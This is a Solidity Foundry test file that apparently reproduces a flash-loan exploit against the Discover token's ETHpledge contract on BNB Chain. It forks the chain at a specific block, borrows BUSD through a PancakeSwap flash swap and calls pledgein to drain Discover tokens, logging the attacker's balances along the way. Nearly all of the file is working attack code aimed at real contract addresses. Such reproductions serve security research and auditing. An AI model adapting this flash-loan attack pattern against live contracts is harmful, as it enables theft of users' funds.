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Discover_exp.sol
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Discover_exp.sol
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// SPDX-License-Identifier: UNLICENSED
pragma solidity 0.8.10;
import "forge-std/Test.sol";
import "./interface.sol";
interface ETHpledge {
function pledgein(address fatheraddr, uint256 amountt)
external
returns (bool);
}
// Expected error. [FAIL. Reason: Pancake: INSUFFICIENT_INPUT_AMOUNT]
// Because we don't repay funds to pancake.
contract ContractTest is DSTest {
IPancakePair PancakePair =
IPancakePair(0x7EFaEf62fDdCCa950418312c6C91Aef321375A00);
IPancakePair PancakePair2 =
IPancakePair(0x92f961B6bb19D35eedc1e174693aAbA85Ad2425d);
IERC20 busd = IERC20(0x55d398326f99059fF775485246999027B3197955);
IERC20 discover = IERC20(0x5908E4650bA07a9cf9ef9FD55854D4e1b700A267);
ETHpledge ethpledge = ETHpledge(0xe732a7bD6706CBD6834B300D7c56a8D2096723A7);
CheatCodes cheats = CheatCodes(0x7109709ECfa91a80626fF3989D68f67F5b1DD12D);
constructor() {
cheats.createSelectFork("bsc", 18446845); // fork bsc at block 18446845
busd.approve(address(ethpledge), type(uint256).max);
discover.approve(address(ethpledge), type(uint256).max);
}
function testExploit() public {
bytes memory data = abi.encode(address(this), 19810777285664651588959);
emit log_named_uint(
"Before flashswap, BUSD balance of attacker:",
busd.balanceOf(address(this))
);
PancakePair2.swap(19810777285664651588959, 0, address(this), data);
}
function pancakeCall(
address sender,
uint256 amount0,
uint256 amount1,
bytes calldata data
) public {
emit log_named_uint(
"After flashswap, BUSD balance of attacker:",
busd.balanceOf(address(this))
);
ethpledge.pledgein(
0xAb21300fA507Ab30D50c3A5D1Cad617c19E83930,
2000000000000000000000
);
emit log_named_uint(
"After Exploit, discover balance of attacker:",
discover.balanceOf(0xAb21300fA507Ab30D50c3A5D1Cad617c19E83930)
);
}
receive() external payable {}
}